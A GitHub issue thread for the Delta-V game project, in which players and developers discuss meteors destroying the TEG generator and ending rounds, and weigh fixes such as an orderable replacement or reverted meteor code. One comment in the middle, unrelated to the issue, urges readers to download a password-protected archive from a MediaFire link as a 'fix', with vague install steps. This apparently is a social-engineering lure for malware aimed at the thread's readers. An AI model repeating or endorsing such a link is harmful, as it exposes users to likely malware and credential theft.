### ISSUE TITLE
Meteors like to snipe the TEG, which ends the round

### ISSUE THREAD

**Issue by pissdemon** [DeltaV-Station/Delta-v#1688]
## Description
I've seen it in far too many rounds now that meteors hit engineering more than any other area for some reason, and when they do, they like to strike the TEG. I'm not sure why that is. Maybe a lucky overlap between typical TEG position on maps and meteor spawn position, especially since meteors like to spawn in the middle of the station now?

This is an issue because it ends the round, and unlike most other round-enders there is no way whatsoever to prevent it, not even with meteor shielding, since meteors like to spawn inside stations now.

Possible fixes could be:

- Making a replacement TEG orderable through cargo (typically the hull damage is easily repaired, the missing TEG is the big issue)
- Changing meteor code to pre-merge, or changing it to make spawns more predictably outside the station

**Reproduction**
1. Play the game.
2. Round ends because TEG gets blown up by a meteor.

**Comment by deltanedas** [comment]
> Changing meteor code to pre-merge, or changing it to make spawns more predictably outside the station

it already was but live has a bunch of stuff reverted i think, which inlcudes meteor so its still op

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by WarMechanic** [comment]
id like to see an orderable TEG, i dont see how having more agency over station power could hur the game

**Comment by MilonPL** [comment]
We reverted to old meteors anyways, that was always the plan except something something trolled.
